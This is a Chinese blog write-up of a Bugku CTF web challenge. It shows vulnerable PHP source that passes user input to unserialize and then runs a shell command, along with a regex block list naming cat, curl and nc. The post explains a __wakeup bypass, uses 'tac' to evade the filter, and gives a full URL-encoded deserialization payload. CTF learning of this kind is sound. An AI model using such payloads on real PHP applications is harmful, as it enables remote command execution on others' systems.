【bugku】安慰奖(绕过__wakeup)

最新推荐文章于 2024-04-13 19:28:22 发布
最新推荐文章于 2024-04-13 19:28:22 发布
阅读量981 收藏 2
点赞数 3
分类专栏: Web刷题记录 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111650958
版权
本文探讨了一个PHP代码中的安全问题,涉及到序列化和反序列化操作。通过利用__wakeup魔法方法的绕过,以及使用tac命令避开系统命令过滤,可以尝试获取flag。文章详细介绍了构造payload的过程,并提供了示例代码,展示了如何通过修改对象属性值来规避安全检查。
摘要由CSDN通过智能技术生成

题目

右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份
我这里用dirsearch扫到备份文件为index.php.bak
源码:

error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

简单审计知道需要利用反序列化来getshell,需要绕过__wakeup魔法方法,有关序列化与序列化魔法方法可以看下这篇文章:https://www.cnblogs.com/HelloCTF/p/13044403.html

__wakeup 将在序列化之后立即被调用,绕过它仅需要将上面的对象属性个数值改得比真实对象大即可,例如:

O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

除此之外,它还利用了正则过滤了许多系统命令,但是用tac命令也可以达到读取文件的效果
在这里插入图片描述

再附上序列化的代码

<?php
class ctf
{
    protected $username = 'admin';
    protected $cmd = 'tac flag.php';
}
$a=new ctf();
echo(urlencode(serialize($a)));
?>

还有一点需要注意,protected属性被序列化的时候属性值会变成:%00*%00属性名
而%00是空字符,在浏览器中会显示为空,但不代表传入时能没有%00,所以我们最后的payload应该加上%00
payload:

?code=O%3A3%3A%22ctf%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D

小 白 萝 卜
关注
专栏目录
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1170
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
Linux内核--wakeup_source机制流程简介
qq_30239761的博客
02-02 3148
timer.c static void do_init_timer(struct timer_list *timer, void (*func)(struct timer_list *), unsigned int flags, const char *name, struct lock_class_key *key) { timer->entry.pprev = NULL; timer->function = func; timer->flags = flags | raw_smp_pr
BUGKU——安慰
doraemon12345的博客
06-08 247
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
Bugku_安慰
CaiNiaoLW的博客
02-27 677
打开页面,发现是空白的,查看源码,发现一段base64加密的密文, 解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $user
Bugku安慰
qq_46230755的博客
01-30 428
打开来查看源代码发现提示 YmFja3Vwcw== base64解码后得到:backups 扫描一下网站 在index.php.bak找到备份文件 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd
bugku】-安慰
weixin_52116519的博客
04-01 825
考点1:绕过__wakeup() 当序列化字符串表示对象属性个数的值大于真实个数的属性时,就会跳过__wakeup()的执行。 考点2:私有属性绕过 ①protected属性被序列化的时候属性值会变成:%00*%00属性名。 private属性被序列化的时候属性值会变成:%00类名%00属性名。 ②直接url编码输出。 考点3:``反引号,可以作为系统命令输出给var_dump $a = `$this->cmd`; var_dump($a); 解题 1、看源码 2、base64解码,是“备份”的意
bugku 安慰
濯君
12-31 1972
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
WakeUP_Poweroff.rar_WakeUP_Poweroff_delphi_delphi 托盘_网络唤醒
09-19
以上内容是根据“WakeUP_Poweroff.rar”压缩包中的资源,特别是“WakeUP_Poweroff”项目,对网络唤醒和Delphi编程实践的深入解析。对于希望学习网络唤醒技术,以及使用Delphi进行系统级编程的开发者来说,这些都是...
wakeup_asm.rar_startup_wakeup
09-19
标题中的“wakeup_asm.rar_startup_wakeup”暗示了这是一个关于计算机操作系统启动唤醒功能的源代码压缩包,特别是涉及到ACPI(Advanced Configuration and Power Interface)协议的实现。在ACPI规范中,启动唤醒...
bugku-web-安慰
qq_75121443的博客
04-13 296
得到备份文件index.php.bak。得到flag.php文件内容。可以开始反序列化操作了。
bugku web 安慰
m0_58189778的博客
08-19 364
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
Bugku CTF 每日一题 安慰
彼岸花苏陌的博客
01-19 708
安慰 打开网页啥都没有 习惯性按f12发现一段base64,解码后发现是 YmFja3Vwcw== backups(备份) 于是想到了网站备份,但是备份目录忘了 于是用dirsearch扫了一下 发现是index.php.bak 于是下载源码发现是代码审计 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class
BugKu_安慰
羽的博客
07-02 212
解码 告诉我有备份文件。 找到这个 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u...
反序列化中_wakeup绕过
rev1ve的博客
09-05 2240
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
duwentao-[本地复现]-[__wakeup()魔术方法绕过]
qwsn
11-22 1607
0x01、Web 1.duwentao-[本地复现] 第一步:代码审计 <?php #error_reporting(0); //注释掉了关闭错误报告 class SoFun //类:SoFun { protected $file = 'index.php'; //保护属性:$file='index.php' public function __construct($file) //构造方法__construct(),在实例化当前类前,自动被调用,使用参数$f
__wakeup()绕过
v2ish1yan的博客
04-23 6705
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数 如xctf-unserialize3 只要序列化的中的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
攻防世界-unserialize3_魔术函数,以及wakeup()函数的绕过
Fisher
05-15 1386
拿到题目得到一段代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化,将xctf类进行序列化,之后如果执行__wakeup()则会跳出, 所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作 所以是将序列化的值反序列化之后执行,因此我们构造序列化的值 先将类进行序列化: <?php
反序列化__wakeup()绕过
csjjjd的博客
01-24 908
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
esp_sleep_wakeup_cause_t wakeup_reason;
最新发布
10-07
`esp_sleep_wakeup_cause_t`是一个枚举类型,在ESP8266/ESP32等Espressif平台的低功耗模式下用于存储唤醒原因。它通常用于记录设备从睡眠状态恢复到正常运行时是由什么原因触发的唤醒。这个枚举包含了多种可能的情况...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值